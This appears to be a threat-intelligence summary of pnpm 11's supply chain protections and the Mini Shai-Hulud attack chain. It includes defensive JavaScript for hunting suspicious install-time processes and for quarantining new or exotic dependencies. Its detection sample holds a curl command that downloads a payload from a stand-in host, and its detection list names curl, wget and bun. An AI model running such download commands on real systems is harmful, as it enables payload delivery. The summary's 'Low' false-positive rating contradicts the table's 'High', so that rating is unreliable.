pnpm 11 Adds Supply Chain Protection Defaults for Minimum Release Age and Exotic Subdependencies
The release of pnpm 11 introduces significant supply chain security enhancements, including a default 24-hour minimum release age for packages, the blocking of exotic subdependencies, and a streamlined allowBuilds model. These features are designed to mitigate rapid supply chain attacks, such as the recent Mini Shai-Hulud campaign, by restricting install-time execution and unexpected dependency sources.
Authors: Sarah Gooding
Source: Socket
What Happened
The popular package manager pnpm has released version 11, which includes new built-in security features to protect developers from malicious software. It now forces a 24-hour waiting period before downloading newly published packages, preventing attackers from quickly spreading bad code. It also blocks hidden or unusual software dependencies by default and gives teams better control over which packages can run scripts during installation. These changes help defend against recent attacks that try to steal passwords and secrets from developers and automated building systems. Developers using pnpm should upgrade to take advantage of these new protections.
Key Takeaways
- pnpm 11 introduces a default Minimum Release Age of 24 hours to mitigate the risk of fast-moving malicious package campaigns.
- Exotic subdependencies (e.g., direct tarball URLs, Git repositories) are now blocked by default to prevent hidden malicious code from entering the dependency tree.
- A new 'allowBuilds' model simplifies the governance of which packages are permitted to execute build scripts during installation.
- The release is a direct response to modern supply chain threats like the 'Mini Shai-Hulud' campaign, which targeted developer and CI/CD secrets via preinstall hooks.
- pnpm 11 also includes built-in SBOM generation, isolated global installs, and drops support for Node.js versions prior to 22.
Affected Systems
- Node.js environments using pnpm
- CI/CD pipelines
- Developer workstations
Attack Chain
In supply chain campaigns like Mini Shai-Hulud, attackers compromise publisher accounts or tokens to push malicious package versions to registries like npm, PyPI, or Packagist. They rely on automated installs or fresh CI environments to pull the package quickly before detection. The malicious packages use preinstall or import-time hooks to download external payloads, such as a platform-specific Bun runtime, which then executes an obfuscated credential stealer targeting developer and CI/CD secrets.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
No specific detection rules are provided in the article, as it focuses on preventative security features introduced in a software update.
Detection Engineering Assessment
- EDR Visibility: Medium. EDR can monitor process creation from package managers (e.g., Node.js spawning shell scripts or curl/wget during preinstall hooks), but may lack context on the specific package being installed.
- Network Visibility: Medium. Network monitoring can detect unexpected downloads (e.g., downloading a Bun runtime from an unknown IP during an npm install), but registry traffic itself is typically encrypted.
- Detection Difficulty: Moderate. Distinguishing legitimate build scripts from malicious preinstall hooks requires baseline knowledge of normal developer activity and package behavior.
Required Log Sources
- Process Creation Logs
- Command Line Logging
- Network Traffic Logs
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for package manager processes (npm, pnpm, yarn) spawning unexpected child processes like curl, wget, or unknown runtimes (e.g., bun) to download external payloads. | Process Creation (Event ID 4688 or Sysmon Event ID 1) | Execution | High (Many legitimate packages download binaries during postinstall/preinstall scripts). |
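The hypothesis above as an added example (not from the article): it walks each suspect process's ancestry, so a downloader launched several levels below a package manager is still attributed to the install. The event fields, the `huntInstallChildren` name, and the sample events are assumptions; pids are assumed unique within the batch.

```javascript
const PACKAGE_MANAGERS = new Set(["npm", "pnpm", "yarn"]);
const SUSPECT_CHILDREN = new Set(["curl", "wget", "bun"]);

// Lower-cased file name without directory or .exe/.cmd suffix (Unix or Windows).
function baseName(image) {
  return image.split(/[\\/]/).pop().toLowerCase().replace(/\.(exe|cmd)$/, "");
}

// A package manager runs either as its own binary or as "node <path>/npm-cli.js".
function isPackageManager(ev) {
  const name = baseName(ev.image);
  if (PACKAGE_MANAGERS.has(name)) return true;
  if (name !== "node") return false;
  const script = baseName(ev.cmd.split(/\s+/)[1] || "");
  return PACKAGE_MANAGERS.has(script.replace(/(-cli)?\.c?js$/, ""));
}

// Flag suspect processes that have a package manager anywhere in their ancestry.
function huntInstallChildren(events) {
  const byPid = new Map(events.map((ev) => [ev.pid, ev]));
  const findings = [];
  for (const ev of events) {
    if (!SUSPECT_CHILDREN.has(baseName(ev.image))) continue;
    const chain = [baseName(ev.image)];
    const seen = new Set([ev.pid]);
    let cur = byPid.get(ev.ppid);
    while (cur && !seen.has(cur.pid)) {
      seen.add(cur.pid);
      chain.unshift(baseName(cur.image));
      if (isPackageManager(cur)) {
        findings.push({ pid: ev.pid, chain: chain.join(" > "), cmd: ev.cmd });
        break;
      }
      cur = byPid.get(cur.ppid);
    }
  }
  return findings;
}

// Constructed sample events (not taken from the article).
const SAMPLE_EVENTS = [
  { pid: 100, ppid: 1, image: "/usr/local/bin/pnpm", cmd: "pnpm install" },
  { pid: 101, ppid: 100, image: "/usr/bin/node", cmd: "node preinstall.js" },
  { pid: 102, ppid: 101, image: "/bin/sh", cmd: "sh -c ./fetch.sh" },
  { pid: 103, ppid: 102, image: "/usr/bin/curl", cmd: "curl -o /tmp/rt.zip https://payload.example.invalid/rt.zip" },
  { pid: 200, ppid: 1, image: "/usr/bin/curl", cmd: "curl https://status.example.invalid/health" },
  { pid: 300, ppid: 1, image: "C:\\Program Files\\nodejs\\node.exe", cmd: "node.exe C:\\npm\\bin\\npm-cli.js ci" },
  { pid: 301, ppid: 300, image: "C:\\Temp\\bun.exe", cmd: "bun.exe run stage.js" },
];
```

Because legitimate install scripts also fetch binaries, the returned chains are triage input to compare against a baseline of known packages, not alerts on their own.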
Control Gaps
- Lack of strict egress filtering on CI/CD build nodes
- Implicit trust in newly published packages without a quarantine period
Key Behavioral Indicators
- Package managers executing obfuscated shell commands
- Unexpected network connections to non-registry domains during package installation
False Positive Assessment
- Low
Recommendations
Immediate Mitigation
- Upgrade to pnpm 11 to leverage the new default supply chain protections.
- Review and configure the 'allowBuilds' setting to explicitly permit only trusted packages to execute build scripts.
Infrastructure Hardening
- Implement egress filtering on CI/CD runners to block unexpected outbound connections during package installation.
- Enforce a minimum release age or quarantine period for all third-party dependencies across all package managers.
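A package-manager-agnostic quarantine gate, as an added example that is not pnpm's implementation or code from the article: it flags resolved versions published less than 24 hours ago and transitive dependencies that resolve to Git or tarball URLs. It relies on the per-version publish timestamps in the npm registry metadata `time` object; the `auditResolved` name, the input shape, and all sample data are assumptions.

```javascript
const DAY_MS = 24 * 60 * 60 * 1000;
// Specifier prefixes treated as exotic here: Git sources and direct URL tarballs.
const EXOTIC = /^(git\+|git:\/\/|github:|https?:\/\/)/i;

// deps: [{ name, version, spec, direct }]; packuments: registry metadata keyed by
// package name, whose "time" object maps each version to its publish timestamp.
function auditResolved(deps, packuments, now, minAgeMs = DAY_MS) {
  const findings = [];
  for (const dep of deps) {
    const id = `${dep.name}@${dep.version}`;
    if (EXOTIC.test(dep.spec)) {
      // Only transitive exotic sources are flagged; direct ones were chosen by the team.
      if (!dep.direct) findings.push({ id, reason: "exotic-subdependency" });
      continue;
    }
    const meta = packuments[dep.name];
    const published = meta && meta.time ? Date.parse(meta.time[dep.version]) : NaN;
    if (Number.isNaN(published)) {
      findings.push({ id, reason: "unknown-publish-time" }); // fail closed
    } else if (now - published < minAgeMs) {
      findings.push({ id, reason: "too-new" });
    }
  }
  return findings;
}

// Constructed sample data (package names, URLs and dates are placeholders).
const NOW = Date.parse("2025-01-10T12:00:00Z");
const SAMPLE_PACKUMENTS = {
  "left-util": { time: { "2.0.0": "2024-11-02T08:00:00Z", "2.0.1": "2025-01-10T03:30:00Z" } },
  "stable-lib": { time: { "1.4.2": "2024-06-01T00:00:00Z" } },
};
const SAMPLE_DEPS = [
  { name: "stable-lib", version: "1.4.2", spec: "^1.4.0", direct: true },
  { name: "left-util", version: "2.0.1", spec: "^2.0.0", direct: false },
  { name: "fork-pkg", version: "0.1.0", spec: "git+https://git.example.invalid/x/fork-pkg.git", direct: false },
  { name: "tool-bin", version: "3.0.0", spec: "https://files.example.invalid/tool-bin-3.0.0.tgz", direct: true },
  { name: "ghost", version: "9.9.9", spec: "^9.0.0", direct: false },
];
```

A version with no publish timestamp is reported rather than passed, so a missing or stale metadata cache cannot silently bypass the quarantine.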
User Protection
- Educate developers on the risks of exotic subdependencies and preinstall scripts.
- Ensure developer workstations have EDR coverage to detect credential theft attempts.
Security Awareness
- Promote awareness of supply chain attacks like Mini Shai-Hulud and the importance of dependency review.
MITRE ATT&CK Mapping
- T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1552.004 - Unsecured Credentials: Private Keys